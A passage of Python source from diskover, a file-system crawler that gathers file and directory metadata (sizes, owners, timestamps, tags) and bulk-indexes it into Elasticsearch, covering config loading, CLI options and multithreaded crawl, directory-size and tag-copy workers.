___ ___ ___ ___\n /\\ \\ /\\ \\ /\\ \\ /\\__\\ /\\ \\ /\\__\\ /\\ \\ /\\ \\\\\n /::\\ \\ _\\:\\ \\ /::\\ \\ /:/ _/_ /::\\ \\ /:/ _/_ /::\\ \\ /::\\ \\\\\n/:/\\:\\__\\ /\\/::\\__\\ /\\:\\:\\__\\ /::-\"\\__\\ /:/\\:\\__\\ |::L/\\__\\ /::\\:\\__\\ /::\\:\\__\\\\\n\\:\\/:/ / \\::/\\/__/ \\:\\:\\/__/ \\;:;-\",-\" \\:\\/:/ / |::::/ / \\:\\:\\/ / \\;:::/ /\n \\::/ / \\:\\__\\ \\::/ / |:| | \\::/ / L;;/__/ \\:\\/ / |:\\/__/\n \\/__/ \\/__/ \\/__/ \\|__| \\/__/ v%s \\/__/ \\|__|\n https://shirosaidev.github.io/diskover\n Bringing light to the 
darkness.\n Support diskover on Patreon or PayPal :)\\033[0m\n\n \"\"\" % (BANNER_COLOR, DISKOVER_VERSION)\n elif b == 3:\n banner = \"\"\"\\033[%s\n\n _/_/_/ _/ _/\n _/ _/ _/_/_/ _/ _/ _/_/ _/ _/ _/_/ _/ _/_/\n _/ _/ _/ _/_/ _/_/ _/ _/ _/ _/ _/_/_/_/ _/_/\n _/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/\n _/_/_/ _/ _/_/_/ _/ _/ _/_/ _/ v%s _/_/_/ _/\n https://shirosaidev.github.io/diskover\n \"I didn't even know that was there.\"\n Support diskover on Patreon or PayPal :)\\033[0m\n\n \"\"\" % (BANNER_COLOR, DISKOVER_VERSION)\n elif b == 4:\n banner = \"\"\"\\033[%s\n\n __ __\n /\\ \\ __ /\\ \\\\\n \\_\\ \\/\\_\\ ____\\ \\ \\/'\\\\ ___ __ __ __ _ __ //\n /'_` \\/\\ \\ /',__\\\\\\ \\ , < / __`\\/\\ \\/\\ \\ /'__`\\/\\`'__\\\\ ('>\n /\\ \\L\\ \\ \\ \\/\\__, `\\\\\\ \\ \\\\\\`\\ /\\ \\L\\ \\ \\ \\_/ |/\\ __/\\ \\ \\/ /rr\n \\ \\___,_\\ \\_\\/\\____/ \\ \\_\\ \\_\\ \\____/\\ \\___/ \\ \\____\\\\\\ \\\\_\\\\ *\\))_\n \\/__,_ /\\/_/\\/___/ \\/_/\\/_/\\/___/ \\/__/ \\/____/ \\\\/_/ v%s\n https://shirosaidev.github.io/diskover\n \"Holy s*i# there are so many temp files.\"\n Support diskover on Patreon or PayPal :)\\033[0m\n\n \"\"\" % (BANNER_COLOR, DISKOVER_VERSION)\n sys.stdout.write(banner)\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n\ndef print_progress_bar(iteration, total, prefix='', suffix='',\n it_name='it', finished=False):\n \"\"\"This is the create terminal progress bar function.\n It outputs a progress bar and shows progress of the queue.\n \"\"\"\n global last_percents\n\n if finished:\n iteration = total\n\n # calculate number of iterations per second and eta\n time_diff = time.time() - STARTTIME\n it_per_sec = round(iteration / time_diff, 1)\n try:\n eta = get_time((total - iteration) / it_per_sec)\n except ZeroDivisionError:\n eta = get_time(0)\n\n decimals = 0\n bar_length = 20\n str_format = \"{0:.\" + str(decimals) + \"f}\"\n try:\n percents = int(str_format.format(100 * (iteration / float(total))))\n except ZeroDivisionError:\n percents = 0\n try:\n filled_length = int(round(bar_length * iteration / float(total)))\n except ZeroDivisionError:\n filled_length = 0\n bar = '█' * filled_length + ' ' * (bar_length - filled_length)\n # only output if percents has increased\n if percents > last_percents or finished:\n sys.stdout.write(\n '\\r\\033[' + BANNER_COLOR + '\\033[1m%s %s%s|%s| %s [%s, %s %s/s]\\033[0m'\n % (prefix, percents, '%', bar, suffix, eta, it_per_sec, it_name))\n sys.stdout.flush()\n last_percents = percents\n\n\ndef print_progress(iteration, total, it_name='it', finished=False):\n \"\"\"This is the create terminal progress function.\n It outputs just progress of the queue in json format.\n \"\"\"\n global last_percents\n\n if finished:\n iteration = total\n\n # calculate number of dirs per second and eta\n time_diff = time.time() - STARTTIME\n it_per_sec = round(iteration / time_diff, 1)\n try:\n eta = get_time((total - iteration) / it_per_sec)\n except ZeroDivisionError:\n eta = get_time(0)\n\n decimals = 0\n str_format = \"{0:.\" + str(decimals) + \"f}\"\n try:\n percents = int(str_format.format(100 * (iteration / float(total))))\n except ZeroDivisionError:\n percents = 0\n # only output if percents has increased\n if percents > last_percents or finished:\n sys.stdout.write(\n '{\"msg\": \"progress\", \"percent\": %s, \"eta\": \"%s\", \"it_per_sec\": %s, \"it_name\": \"%s\"}\\n'\n % (percents, eta, it_per_sec, it_name))\n sys.stdout.flush()\n last_percents = percents\n\n\ndef load_config():\n \"\"\"This is the load config function.\n It checks for config file and 
loads in\n the config settings.\n \"\"\"\n configsettings = {}\n config = ConfigParser.ConfigParser()\n dir_path = os.path.dirname(os.path.realpath(__file__))\n configfile = '%s/diskover.cfg' % dir_path\n # Check for config file\n if not os.path.isfile(configfile):\n print('Config file diskover.cfg not found')\n sys.exit(1)\n config.read(configfile)\n try:\n d = config.get('excludes', 'dirs')\n configsettings['excluded_dirs'] = d.split(',')\n except Exception:\n configsettings['excluded_dirs'] = []\n try:\n f = config.get('excludes', 'files')\n configsettings['excluded_files'] = f.split(',')\n except Exception:\n configsettings['excluded_files'] = []\n try:\n configsettings['aws'] = config.get('elasticsearch', 'aws')\n except Exception:\n configsettings['aws'] = \"False\"\n try:\n configsettings['es_host'] = config.get('elasticsearch', 'host')\n except Exception:\n configsettings['es_host'] = \"localhost\"\n try:\n configsettings['es_port'] = int(config.get('elasticsearch', 'port'))\n except Exception:\n configsettings['es_port'] = 9200\n try:\n configsettings['es_user'] = config.get('elasticsearch', 'user')\n except Exception:\n configsettings['es_user'] = ''\n try:\n configsettings['es_password'] = config.get('elasticsearch', 'password')\n except Exception:\n configsettings['es_password'] = ''\n try:\n configsettings['index'] = config.get('elasticsearch', 'indexname')\n except Exception:\n configsettings['index'] = ''\n try:\n configsettings['es_timeout'] = \\\n int(config.get('elasticsearch', 'timeout'))\n except Exception:\n configsettings['es_timeout'] = 10\n try:\n configsettings['es_maxsize'] = \\\n int(config.get('elasticsearch', 'maxsize'))\n except Exception:\n configsettings['es_maxsize'] = 10\n try:\n configsettings['es_max_retries'] = \\\n int(config.get('elasticsearch', 'maxretries'))\n except Exception:\n configsettings['es_max_retries'] = 0\n try:\n configsettings['es_chunksize'] = \\\n int(config.get('elasticsearch', 'chunksize'))\n except Exception:\n configsettings['es_chunksize'] = 500\n try:\n configsettings['listener_host'] = config.get('socketlistener', 'host')\n except Exception:\n configsettings['listener_host'] = \"localhost\"\n try:\n configsettings['listener_port'] = \\\n int(config.get('socketlistener', 'port'))\n except Exception:\n configsettings['listener_port'] = 9999\n try:\n configsettings['listener_diskover_path'] = \\\n config.get('socketlistener', 'diskoverpath')\n except Exception:\n configsettings['listener_diskover_path'] = \"/usr/local/bin/diskover.py\"\n try:\n configsettings['listener_python_path'] = \\\n config.get('socketlistener', 'pythonpath')\n except Exception:\n configsettings['listener_python_path'] = \"python\"\n try:\n configsettings['md5_readsize'] = \\\n int(config.get('dupescheck', 'readsize'))\n except Exception:\n configsettings['md5_readsize'] = 65536\n try:\n configsettings['botsleep'] = \\\n float(config.get('crawlbot', 'sleeptime'))\n except Exception:\n configsettings['botsleep'] = 0.1\n try:\n configsettings['gource_maxfilelag'] = \\\n float(config.get('gource', 'maxfilelag'))\n except Exception:\n configsettings['gource_maxfilelag'] = 5\n\n return configsettings\n\n\ndef parse_cli_args(indexname):\n \"\"\"This is the parse CLI arguments function.\n It parses command line arguments.\n \"\"\"\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--rootdir\", metavar='PATH', default=\".\",\n help=\"Directory to start crawling from (default: .)\")\n parser.add_argument(\"-m\", \"--mtime\", metavar='DAYS', 
default=0, type=int,\n help=\"Minimum days ago for modified time (default: 0)\")\n parser.add_argument(\"-s\", \"--minsize\", metavar='BYTES', default=1, type=int,\n help=\"Minimum file size in Bytes (default: >0B)\")\n parser.add_argument(\"-t\", \"--threads\", default=8, type=int,\n help=\"Number of threads to use (default: 8)\")\n parser.add_argument(\"-i\", \"--index\", default=indexname,\n help=\"Elasticsearch index name (default: from config)\")\n parser.add_argument(\"-n\", \"--nodelete\", action=\"store_true\",\n help=\"Add data to existing index (default: overwrite \\\n index)\")\n parser.add_argument(\"-b\", \"--breadthfirst\", action=\"store_true\",\n help=\"Breadthfirst crawl (default: depthfirst)\")\n parser.add_argument(\"-M\", \"--maxdepth\", type=int, default=100,\n help=\"Maximum directory depth to crawl (default: \\\n 100)\")\n parser.add_argument(\"-r\", \"--reindex\", action=\"store_true\",\n help=\"Reindex (freshen) directory (non-recursive)\")\n parser.add_argument(\"-R\", \"--reindexrecurs\", action=\"store_true\",\n help=\"Reindex directory and all subdirs (recursive)\")\n parser.add_argument(\"-f\", \"--file\",\n help=\"Index single file\")\n parser.add_argument(\"-D\", \"--finddupes\", action=\"store_true\",\n help=\"Find duplicate files in existing index and update \\\n their dupe_md5 field\")\n parser.add_argument(\"-S\", \"--dirsize\", metavar='DIR', nargs=\"?\", const=\"all\",\n help=\"Calculate size of directories in existing index \\\n (default: all dirs)\")\n parser.add_argument(\"-C\", \"--copytags\", metavar='INDEX2', nargs=1,\n help=\"Copy tags from index2 to index\")\n parser.add_argument(\"-B\", \"--crawlbot\", action=\"store_true\",\n help=\"Starts up crawl bot to scan for dir changes in index\")\n parser.add_argument(\"-l\", \"--listen\", action=\"store_true\",\n help=\"Open socket and listen for remote commands\")\n parser.add_argument(\"--gourcert\", action=\"store_true\",\n help=\"Get realtime crawl data from ES for gource\")\n parser.add_argument(\"--gourcemt\", action=\"store_true\",\n help=\"Get file mtime data from ES for gource\")\n parser.add_argument(\"--nice\", action=\"store_true\",\n help=\"Runs in nice mode (less cpu/disk io)\")\n parser.add_argument(\"-q\", \"--quiet\", action=\"store_true\",\n help=\"Runs with no output\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\",\n help=\"Increase output verbosity\")\n parser.add_argument(\"--debug\", action=\"store_true\",\n help=\"Debug message output\")\n parser.add_argument(\"--progress\", action=\"store_true\",\n help=\"Only output progress (json)\")\n parser.add_argument(\"--listplugins\", action=\"store_true\",\n help=\"List plugins\")\n parser.add_argument(\"-V\", \"--version\", action=\"version\",\n version=\"diskover v%s\" % DISKOVER_VERSION,\n help=\"Prints version and exits\")\n args = parser.parse_args()\n return args\n\n\ndef crawl_path(path, threadnum, filelist, dirlist):\n \"\"\"This is the crawl path function.\n It crawls the directory in path using scandir and adds to\n dirlist and filelist lists.\n Returns if directory in 'excluded_dirs' or path is None.\n \"\"\"\n global total_dirs\n\n # add the directory and it's files to ES\n if VERBOSE:\n LOGGER.info('[thread-%s]: Crawling: %s', threadnum, path)\n with lock:\n total_dirs += 1\n\n # crawl directory using scandir\n try:\n if VERBOSE:\n LOGGER.info('[thread-%s]: Getting meta for dir: %s',\n threadnum, path)\n # get directory meta info and add to dirlist\n dirlist = get_dir_meta(threadnum, path, 
dirlist)\n\n # check maxdepth\n root = os.path.abspath(CLIARGS['rootdir']).rstrip(os.path.sep)\n num_sep = root.count(os.path.sep)\n depth = path.count(os.path.sep) - num_sep\n if depth < CLIARGS['maxdepth']:\n for entry in scandir(path):\n if entry.is_symlink():\n if VERBOSE:\n LOGGER.info('[thread-%s]: Skipping symlink: %s',\n threadnum, entry.path)\n continue\n if entry.is_file():\n if VERBOSE:\n LOGGER.info('[thread-%s]: Getting meta for file: %s',\n threadnum, entry.path)\n # get file meta info and add to filelist\n filelist = get_file_meta(threadnum, entry, filelist)\n\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error(\n 'Failed to crawl directory %s', path, exc_info=True)\n pass\n\n return filelist, dirlist\n\n\ndef update_progress(finished=False):\n \"\"\"Updates progress on screen.\"\"\"\n if CLIARGS['quiet'] or VERBOSE:\n return\n if CLIARGS['finddupes']:\n t = total_hash_groups\n i = t - q.qsize()\n prefix = \"Checking:\"\n it_name = \"hg\"\n elif CLIARGS['dirsize']:\n with lock:\n t = total_dirs\n i = t - q.qsize()\n prefix = \"Calculating:\"\n it_name = \"dir\"\n elif CLIARGS['copytags']:\n with lock:\n t = total_dirs + total_files\n i = t - q.qsize()\n prefix = \"Copying:\"\n it_name = \"doc\"\n else:\n with lock:\n t = total_dirs\n i = t - q.qsize()\n prefix = \"Crawling:\"\n it_name = \"dir\"\n if i > 0 and i % 10 == 0 or finished:\n if CLIARGS['progress']:\n print_progress(i, t, it_name, finished)\n else:\n print_progress_bar(i, t, prefix, '%s/%s' % (i, t), it_name, finished)\n\n\ndef crawl_worker(threadnum):\n \"\"\"This is the crawl worker function.\n It gets a directory from the Queue passes\n the directory to the crawl_path function.\n It runs in infinite loop until all worker thread\n tasks are finished (Queue empty).\n \"\"\"\n\n # create lists to hold files and directories\n filelist = []\n dirlist = []\n\n while True:\n if CLIARGS['nice']:\n time.sleep(.01)\n if VERBOSE:\n LOGGER.info('[thread-%s]: Looking for the next path in the queue',\n threadnum)\n\n # get a path from the Queue\n if CLIARGS['breadthfirst']:\n pri, path = q.get()\n else:\n path = q.get()\n\n if path is None:\n # add filelist to ES and empty it\n if len(filelist) > 0:\n index_add_files(threadnum, filelist)\n del filelist[:]\n # add dirlist to ES and empty it\n if len(dirlist) > 0:\n index_add_dirs(threadnum, dirlist)\n del dirlist[:]\n update_progress(finished=True)\n # stop thread's infinite loop\n q.task_done()\n break\n else:\n # start crawling the path\n filelist, dirlist = crawl_path(path, threadnum, filelist, dirlist)\n\n # update progress bar\n update_progress()\n\n # task is done\n q.task_done()\n\n\ndef get_dir_meta(threadnum, path, dirlist):\n \"\"\"This is the get directory meta data function.\n It gets directory meta and adds to Elasticsearch.\n Once dirlist reaches max chunk_size or Queue is empty,\n it is bulk added to Elasticsearch and emptied.\n \"\"\"\n global reindex_dir_list\n\n try:\n lstat_path = os.lstat(path)\n # add directory meta data to dirlist list\n mtime_unix = lstat_path.st_mtime\n mtime_utc = datetime.utcfromtimestamp(mtime_unix)\\\n .strftime('%Y-%m-%dT%H:%M:%S')\n atime_unix = lstat_path.st_atime\n atime_utc = datetime.utcfromtimestamp(atime_unix)\\\n .strftime('%Y-%m-%dT%H:%M:%S')\n ctime_unix = lstat_path.st_ctime\n ctime_utc = datetime.utcfromtimestamp(ctime_unix)\\\n .strftime('%Y-%m-%dT%H:%M:%S')\n # get time now in utc\n indextime_utc = datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.%f\")\n # get user id of owner\n uid = lstat_path.st_uid\n # try to 
get owner user name\n try:\n owner = pwd.getpwuid(uid).pw_name.split('\\\\')\n # remove domain before owner\n if len(owner) == 2:\n owner = owner[1]\n else:\n owner = owner[0]\n # if we can't find the owner's user name, use the uid number\n except KeyError:\n owner = uid\n # get group id\n gid = lstat_path.st_gid\n # try to get group name\n try:\n group = grp.getgrgid(gid).gr_name.split('\\\\')\n # remove domain before group\n if len(group) == 2:\n group = group[1]\n else:\n group = group[0]\n # if we can't find the group name, use the gid number\n except KeyError:\n group = gid\n\n filename = os.path.basename(path)\n parentdir = os.path.abspath(os.path.join(path, os.pardir))\n fullpath = parentdir + '/' + filename\n\n dirmeta_dict = {\n \"filename\": filename,\n \"path_parent\": parentdir,\n \"filesize\": 0,\n \"items\": 0,\n \"last_modified\": mtime_utc,\n \"last_access\": atime_utc,\n \"last_change\": ctime_utc,\n \"owner\": owner,\n \"group\": group,\n \"tag\": \"\",\n \"tag_custom\": \"\",\n \"indexing_date\": indextime_utc\n }\n\n # search for and copy over any existing tags\n search_path = fullpath\n for sublist in reindex_dir_list:\n if sublist[0] == search_path:\n dirmeta_dict['tag'] = sublist[1]\n dirmeta_dict['tag_custom'] = sublist[2]\n break\n\n # check plugins for adding extra meta data to dirmeta_dict\n for plugin in plugins:\n try:\n # check if plugin is for directory doc\n mappings = {'mappings': {'directory': {'properties': {}}}}\n mappings = (plugin.add_mappings(mappings))\n dirmeta_dict.update(plugin.add_meta(fullpath))\n except KeyError:\n pass\n\n # add dirinfo to dirlist\n dirlist.append(dirmeta_dict)\n\n # when dirlist reaches max chunk size, bulk add to ES and empty it\n if len(dirlist) >= CONFIG['es_chunksize']:\n index_add_dirs(threadnum, dirlist)\n del dirlist[:]\n\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error('Error crawling directory %s', path, exc_info=True)\n pass\n\n return dirlist\n\n\ndef get_file_meta(threadnum, entry, filelist, singlefile=False):\n \"\"\"This is the get file meta data function.\n It gets file meta and adds to Elasticsearch.\n Once filelist reaches max chunk_size or Queue is empty,\n it is bulk added to Elasticsearch and emptied.\n Ignores files smaller than 'minsize' Bytes, newer\n than 'daysold' old and in 'excluded_files'.\n \"\"\"\n global total_files\n global total_file_size\n global total_files_skipped\n global total_file_size_skipped\n global reindex_file_list\n\n try:\n entry_stat = entry.stat()\n # get file size (bytes)\n size = entry_stat.st_size\n\n # add to totals\n if not singlefile:\n with lock:\n total_files += 1\n total_file_size += size\n\n LOGGER.debug('Filename: <%s>', entry.name)\n LOGGER.debug('Path: <%s>', entry.path)\n\n # Skip files smaller than minsize cli flag\n if size < CLIARGS['minsize']:\n if VERBOSE:\n LOGGER.info('[thread-%s]: Skipping (size) %s',\n threadnum, entry.path)\n if not singlefile:\n with lock:\n total_files_skipped += 1\n total_file_size_skipped += size\n return filelist\n\n # check if file is in exluded_files list\n if entry.name in CONFIG['excluded_files'] or \\\n (entry.name.startswith('.') and u'.*'\n in CONFIG['excluded_files']):\n if VERBOSE:\n LOGGER.info('[thread-%s]: Skipping (excluded file) %s',\n threadnum, entry.path)\n if not singlefile:\n with lock:\n total_files_skipped += 1\n total_file_size_skipped += size\n return filelist\n\n # get file extension and check excluded_files\n extension = os.path.splitext(entry.name)[1][1:].strip().lower()\n LOGGER.debug('Extension: 
<%s>', extension)\n if (not extension and 'NULLEXT' in CONFIG['excluded_files']) \\\n or '*.' + extension in CONFIG['excluded_files']:\n if VERBOSE:\n LOGGER.info('[thread-%s]: Skipping (excluded file) %s',\n threadnum, entry.path)\n if not singlefile:\n with lock:\n total_files_skipped += 1\n total_file_size_skipped += size\n return filelist\n\n # check file modified time\n mtime_unix = entry_stat.st_mtime\n mtime_utc = \\\n datetime.utcfromtimestamp(mtime_unix).strftime('%Y-%m-%dT%H:%M:%S')\n # Convert time in days to seconds\n time_sec = CLIARGS['mtime'] * 86400\n file_mtime_sec = time.time() - mtime_unix\n # Only process files modified at least x days ago\n if file_mtime_sec < time_sec:\n if VERBOSE:\n LOGGER.info('[thread-%s]: Skipping (mtime) %s',\n threadnum, entry.path)\n if not singlefile:\n with lock:\n total_files_skipped += 1\n total_file_size_skipped += size\n return filelist\n\n # get access time\n atime_unix = entry_stat.st_atime\n atime_utc = \\\n datetime.utcfromtimestamp(atime_unix).strftime('%Y-%m-%dT%H:%M:%S')\n # get change time\n ctime_unix = entry_stat.st_ctime\n ctime_utc = \\\n datetime.utcfromtimestamp(ctime_unix).strftime('%Y-%m-%dT%H:%M:%S')\n # get user id of owner\n uid = entry_stat.st_uid\n # try to get owner user name\n try:\n owner = pwd.getpwuid(uid).pw_name.split('\\\\')\n # remove domain before owner\n if len(owner) == 2:\n owner = owner[1]\n else:\n owner = owner[0]\n # if we can't find the owner's user name, use the uid number\n except KeyError:\n owner = uid\n # get group id\n gid = entry_stat.st_gid\n # try to get group name\n try:\n group = grp.getgrgid(gid).gr_name.split('\\\\')\n # remove domain before group\n if len(group) == 2:\n group = group[1]\n else:\n group = group[0]\n # if we can't find the group name, use the gid number\n except KeyError:\n group = gid\n # get inode number\n inode = entry.inode()\n # get number of hardlinks\n hardlinks = entry_stat.st_nlink\n # create md5 hash of file using metadata filesize and mtime\n filestring = str(size) + str(mtime_unix)\n filehash = hashlib.md5(filestring.encode('utf-8')).hexdigest()\n # get time\n indextime_utc = datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.%f\")\n # get absolute path of parent directory\n parentdir = os.path.abspath(os.path.join(entry.path, os.pardir))\n\n # create file metadata dictionary\n filemeta_dict = {\n \"filename\": entry.name,\n \"extension\": extension,\n \"path_parent\": parentdir,\n \"filesize\": size,\n \"owner\": owner,\n \"group\": group,\n \"last_modified\": mtime_utc,\n \"last_access\": atime_utc,\n \"last_change\": ctime_utc,\n \"hardlinks\": hardlinks,\n \"inode\": inode,\n \"filehash\": filehash,\n \"tag\": \"\",\n \"tag_custom\": \"\",\n \"dupe_md5\": \"\",\n \"indexing_date\": indextime_utc,\n \"indexing_thread\": threadnum\n }\n\n # check if we are just indexing one file\n if singlefile:\n # check if file exists already in index\n LOGGER.info('Removing any existing same file from index')\n index_delete_file(filemeta_dict)\n\n # search for and copy over any existing tags\n search_path = parentdir + '/' + entry.name\n for sublist in reindex_file_list:\n if sublist[0] == search_path:\n filemeta_dict['tag'] = sublist[1]\n filemeta_dict['tag_custom'] = sublist[2]\n break\n\n # check plugins for adding extra meta data to filemeta_dict\n for plugin in plugins:\n try:\n # check if plugin is for file doc\n mappings = {'mappings': {'file': {'properties': {}}}}\n mappings = (plugin.add_mappings(mappings))\n filemeta_dict.update(plugin.add_meta(entry.path))\n 
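# Note: the two plugin calls above imply the plugin contract assumed throughout this file:\n            # add_mappings(mappings) is probed with a doc-type skeleton and should raise KeyError for\n            # doc types the plugin does not handle, while add_meta(path) returns a dict of extra\n            # fields merged into the doc. A minimal hypothetical plugin module might look like:\n            #     def add_mappings(mappings):\n            #         mappings['mappings']['file']['properties']['myfield'] = {'type': 'keyword'}\n            #         return mappings\n            #     def add_meta(path):\n            #         return {'myfield': 'somevalue'}\n            # ('myfield' and 'somevalue' are made-up placeholders, not part of any real plugin.)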
except KeyError:\n pass\n\n # add file metadata dictionary to filelist list\n filelist.append(filemeta_dict)\n\n # check if we are just indexing one file\n if singlefile:\n LOGGER.info('Adding file to index: %s' % CLIARGS['index'])\n index_add_files(threadnum, filelist)\n LOGGER.info('File added to Elasticsearch, any tags have been copied')\n return\n else:\n # when filelist reaches max chunk size, bulk add to ES and empty it\n if len(filelist) >= CONFIG['es_chunksize']:\n index_add_files(threadnum, filelist)\n del filelist[:]\n\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error('[thread-%s]: Error crawling file %s',\n threadnum, entry.path, exc_info=True)\n pass\n\n return filelist\n\n\ndef escape_chars(text):\n \"\"\"This is the escape special characters function.\n It returns escaped strings for ES queries.\"\"\"\n chr_dict = {'/': '\\\\/', '(': '\\\\(', ')': '\\\\)', '[': '\\\\[', ']': '\\\\]',\n ' ': '\\\\ ', '&': '\\\\&', '<': '\\\\<', '>': '\\\\>', '+': '\\\\+', '-': '\\\\-',\n '|': '\\\\|', '!': '\\\\!', '{': '\\\\{', '}': '\\\\}', '^': '\\\\^', '~': '\\\\~',\n '?': '\\\\?', ':': '\\\\:'}\n def char_trans(text, chr_dict):\n for key, value in chr_dict.items():\n text = text.replace(key, value)\n return text\n if IS_PY3:\n text_esc = text.translate(str.maketrans(chr_dict))\n else:\n text_esc = char_trans(text, chr_dict)\n return text_esc\n\n\ndef dirsize_worker(threadnum):\n \"\"\"This is the get directory size worker function.\n It gets a directory from the Queue and searches ES for all files\n in the directory (recursive) and sums their filesizes\n to create a total filesize and item count for each dir.\n Updates dir doc's filesize and items fields.\n \"\"\"\n dir_id_list = []\n\n while True:\n totalsize = 0\n totalitems = 0\n\n if CLIARGS['nice']:\n time.sleep(.01)\n if VERBOSE:\n LOGGER.info('[thread-%s]: Looking for the next directory',\n threadnum)\n path = q.get() # [docid, fullpath, mtime, doctype]\n\n if path is None:\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, dir_id_list, index=CLIARGS['index'],\n doc_type='directory',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n del dir_id_list[:]\n update_progress(finished=True)\n # stop thread's infinite loop\n q.task_done()\n break\n else:\n if VERBOSE:\n LOGGER.info('[thread-%s]: Calculating size: %s', threadnum, path[1])\n\n # file doc search with aggregate for sum filesizes\n # escape special characters\n newpath = escape_chars(path[1])\n\n data = {\n \"size\": 0,\n \"query\": {\n \"query_string\": {\n \"query\": \"path_parent: \" + newpath + \" \\\n OR path_parent: \" + newpath + \"\\/*\",\n \"analyze_wildcard\": \"true\"\n }\n },\n \"aggs\": {\n \"total_size\": {\n \"sum\": {\n \"field\": \"filesize\"\n }\n }\n }\n }\n\n # refresh index\n #ES.indices.refresh(index=CLIARGS['index'])\n # search ES and start scroll\n res = ES.search(index=CLIARGS['index'], doc_type='file', body=data,\n request_timeout=CONFIG['es_timeout'])\n\n # add total files to items\n totalitems += res['hits']['total']\n\n # total file size sum\n totalsize = res['aggregations']['total_size']['value']\n\n # search and add total directories to items\n\n data = {\n \"size\": 0,\n \"query\": {\n \"query_string\": {\n \"query\": \"path_parent: \" + newpath + \" \\\n OR path_parent: \" + newpath + \"\\/*\",\n \"analyze_wildcard\": \"true\"\n }\n }\n }\n\n res = ES.search(index=CLIARGS['index'], doc_type='directory',\n 
body=data, request_timeout=CONFIG['es_timeout'])\n\n # add total directories (subdirs) to items\n totalitems += res['hits']['total']\n\n # ES id of directory doc\n directoryid = path[0]\n\n # update filesize field for directory (path) doc\n d = {\n '_op_type': 'update',\n '_index': CLIARGS['index'],\n '_type': 'directory',\n '_id': directoryid,\n 'doc': {'filesize': totalsize, 'items': totalitems}\n }\n dir_id_list.append(d)\n\n # bulk add to ES once we reach max chunk size\n if len(dir_id_list) >= CONFIG['es_chunksize']:\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, dir_id_list, index=CLIARGS['index'],\n doc_type='directory',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n del dir_id_list[:]\n\n update_progress()\n\n # task is done\n q.task_done()\n\n\ndef copytag_worker(threadnum):\n \"\"\"This is the copy tag worker function.\n It gets a path from the Queue and searches index2 for the\n same path and copies any existing tags.\n Updates index's doc's tag and tag_custom fields.\n \"\"\"\n dir_id_list = []\n file_id_list = []\n\n while True:\n totalsize = 0\n totalitems = 0\n\n if CLIARGS['nice']:\n time.sleep(.01)\n if VERBOSE:\n LOGGER.info('[thread-%s]: Looking for the next path in queue',\n threadnum)\n path = q.get() # [docid, fullpath, mtime, doctype]\n\n if path is None:\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, dir_id_list, index=CLIARGS['index'],\n doc_type='directory',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n del dir_id_list[:]\n helpers.bulk(ES, file_id_list, index=CLIARGS['index'],\n doc_type='file',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n del file_id_list[:]\n update_progress(finished=True)\n # stop thread's infinite loop\n q.task_done()\n break\n else:\n if VERBOSE:\n LOGGER.info('[thread-%s]: Copying tags: %s', threadnum, path[1])\n\n # doc search (matching path) in index2 for existing tags\n # filename\n f = os.path.basename(path[1])\n # parent path\n p = os.path.abspath(os.path.join(path[1], os.pardir))\n\n data = {\n \"size\": 1,\n \"_source\": ['tag', 'tag_custom'],\n \"query\": {\n \"query_string\": {\n \"query\": \"filename: \\\"\" + f + \"\\\" AND path_parent: \\\"\" + p + \"\\\"\"\n }\n }\n }\n\n # refresh index\n #ES.indices.refresh(index=CLIARGS['index'])\n\n # check if file or directory\n if path[3] is 'directory':\n # search ES\n res = ES.search(index=CLIARGS['copytags'], doc_type='directory', body=data,\n request_timeout=CONFIG['es_timeout'])\n else:\n res = ES.search(index=CLIARGS['copytags'], doc_type='file', body=data,\n request_timeout=CONFIG['es_timeout'])\n\n # mark task done if no matching path in index2 and continue\n if len(res['hits']['hits']) == 0:\n update_progress()\n q.task_done()\n continue\n\n # existing tag in index2\n tag = res['hits']['hits'][0]['_source']['tag']\n # existing tag_custom in index2\n tag_custom = res['hits']['hits'][0]['_source']['tag_custom']\n\n # update tag and tag_custom fields in index\n d = {\n '_op_type': 'update',\n '_index': CLIARGS['index'],\n '_type': path[3],\n '_id': path[0],\n 'doc': {'tag': tag, 'tag_custom': tag_custom}\n }\n if path[3] is 'directory':\n dir_id_list.append(d)\n else:\n file_id_list.append(d)\n\n # bulk add to ES once we reach max chunk size\n if len(dir_id_list) >= 
CONFIG['es_chunksize']:\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, dir_id_list, index=CLIARGS['index'],\n doc_type='directory',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n del dir_id_list[:]\n if len(file_id_list) >= CONFIG['es_chunksize']:\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, file_id_list, index=CLIARGS['index'],\n doc_type='file',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n del file_id_list[:]\n\n update_progress()\n\n # task is done\n q.task_done()\n\n\ndef check_dir_excludes(path):\n \"\"\"Return Boolean if path in excluded_dirs list\"\"\"\n global total_dirs_skipped\n\n # skip any dirs in excluded dirs\n if os.path.basename(path) in CONFIG['excluded_dirs'] \\\n or path in CONFIG['excluded_dirs']:\n if VERBOSE:\n LOGGER.info('Skipping (excluded dir) %s', path)\n with lock:\n total_dirs_skipped += 1\n return True\n # skip any dirs which start with . and in excluded dirs\n elif os.path.basename(path).startswith('.') and 